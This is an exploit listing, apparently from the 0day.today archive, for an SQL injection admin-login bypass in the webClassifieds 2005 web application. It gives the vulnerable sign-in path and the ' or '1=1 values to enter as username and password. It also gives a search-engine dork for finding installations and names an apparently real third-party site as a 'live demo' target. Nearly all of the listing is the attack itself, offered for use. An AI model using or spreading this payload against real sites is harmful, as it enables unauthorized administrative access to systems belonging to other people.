webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability

2008-12-29T00:00:00
ID 1337DAY-ID-4557
Type zdt
Reporter AnGeL25dZ
Modified 2008-12-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability
=============================================================


************************************************************
** 		 webClassifieds © 2005 Admin Login Bypass vulnerability
************************************************************
**  Prodcut:		webClassifieds © 2005    
**  Home   : 		http://www.webscribble.com/
**  Vunlerability :		Admin Bypass
**  Risk  :			low
**  Dork : 		"powered by webClassifieds"
************************************************************
** Discovred by:	AnGeL25dZ
** From	       :	Constantine - Algeria
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeachTeam    http://www.hackteach.org/
** 		 cold zero, Ra3ch, His0k4
************************************************************
**  Exploit:
**  http://[PATH]//classifieds/index.php?page=sign_in
**
**  user :              admin      /        user :           ' or '1=1
**  password :     ' or '1=1   /        password:    ' or '1=1
**  
****************************************************************
** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
****************************************************************



#  0day.today [2018-03-19]  #